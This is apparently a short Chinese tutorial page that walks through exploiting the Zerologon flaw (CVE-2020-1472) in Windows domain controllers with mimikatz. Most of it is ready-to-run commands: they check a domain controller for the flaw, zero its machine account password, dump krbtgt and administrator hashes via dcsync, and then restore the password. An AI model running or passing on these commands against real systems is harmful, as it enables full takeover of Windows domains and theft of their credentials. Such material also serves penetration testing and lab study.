一、检测目标机是否存在cve2020-1472

lsadump::zerologon /target:域控ip /account:域控主机名$
lsadump::zerologon /target:10.0.0.200 /account:dc$

利用mimikatz复现cve2020-1472

二、清空域控密码

lsadump::zerologon /target:域控ip /account:域控主机名$ /exploit
lsadump::zerologon /target:10.0.0.200 /account:dc$ /exploit

利用mimikatz复现cve2020-1472

三、导出hash

lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:dc$ /authdomain:de1ay.com /authpassword:"" /authntlm

lsadump::dcsync /domain:test.com /dc:dc.test.com /user:administrator /authuser:dc$ /authdomain:test.com /authpassword:"" /authntlm

利用mimikatz复现cve2020-1472
四、恢复密码:

lsadump::postzerologon /target:域控ip /account:域控主机名$
lsadump::postzerologon /target:10.0.0.200 /account:dc$

利用mimikatz复现cve2020-1472
注意:在恢复密码要使用管理员权限

相关文章:

  • 2022-01-24
  • 2021-11-30
  • 2022-12-23
  • 2022-12-23
  • 2021-09-17
  • 2021-09-14
  • 2021-12-14
猜你喜欢
  • 2022-12-23
  • 2021-12-21
  • 2021-05-24
  • 2021-08-10
  • 2021-08-09
  • 2021-10-08
相关资源
相似解决方案